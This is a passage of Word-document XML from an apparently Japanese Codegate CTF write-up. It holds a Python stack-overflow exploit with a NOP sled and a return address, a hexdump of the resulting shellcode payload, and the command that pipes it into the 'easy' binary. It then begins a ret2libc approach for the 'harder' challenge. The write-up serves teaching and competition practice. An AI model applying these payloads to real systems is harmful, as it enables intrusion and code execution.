                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>## jump to 0x080484df</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xdf\x84\x04\x08"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>sys.stdout.write(shell)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>出力結果をファイルへ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2100" type="#_x0000_t202" style="width:399.85pt;height:128.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2100" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 python exp.py &gt; exploit2</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 hexdump -C exploit2</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00000000  33 c9 83 e9 f5 e8 ff ff  ff ff c0 5e 81 76 0e 1d  |3..........^.v..|</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00000010  af f1 8b 83 ee fc e2 f4  77 a4 a9 12 4f c9 99 a6  |........w...O...|</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00000020  7e 26 16 e3 32 dc 99 8b  75 80 93 e2 73 26 12 d9  |~&amp;..2...u...s&amp;..|</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00000030  f5 a7 f1 8b 1d cc 90 ff  3d e4 b4 d2 1d f8 a2 02  |........=.......|</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00000040  fc 62 71 8b 90 90 90 90  90 90 90 90 90 90 90 90  |.bq.............|</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00000050  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|</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00000100  90 90 90 90 90 90 90 90  90 90 90 90 df 84 04 08  |................|</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00000110</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ファイル内容を</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>easy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の標準入力へ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2099" type="#_x0000_t202" style="width:399.85pt;height:41.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2099" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 cat exploit2 | ./easy</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Input: passwdxxxxxxxxxxxxxxxxx（ここにパスワードが表示される）</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRPr="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRPr="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1077" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc257340755"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:800   </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Answer:e2e4cb6adc9cd761dcde774f84529591</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2097" type="#_x0000_t202" style="width:437.4pt;height:46.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2097" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>credentials: ctf4.codegate.org 9001</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>BINARY FILE: http://ctf.codegate.org/files____/harder</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>は</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>easy</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>と「スタック上での実行権限がない」点を除いて同一のバイナリ。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>このために</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>easy</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のようにスタック上の</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を実行することはできない。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>そこで</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>execl</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>へジャンプさせ、別のプログラムを実行させる方法をとった。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob02</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>は</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob05</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>と同じサーバーとなっているため、</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob02</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のアカウントで</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ctf4.codegate.org</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>へログインし</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の動作をチェックすることにした。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>サーバーからダウンロードした</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を、</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>と同じサーバーとなっている</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のテンポラリフォルダへアップロードした。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="008A4C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2096" type="#_x0000_t202" style="width:399.85pt;height:29.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2096" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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hugh@codegate-desktop:/tmp/0071234$ ls</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harder</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="008A4C86" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>さっそくデバッグ開始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="008A4C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
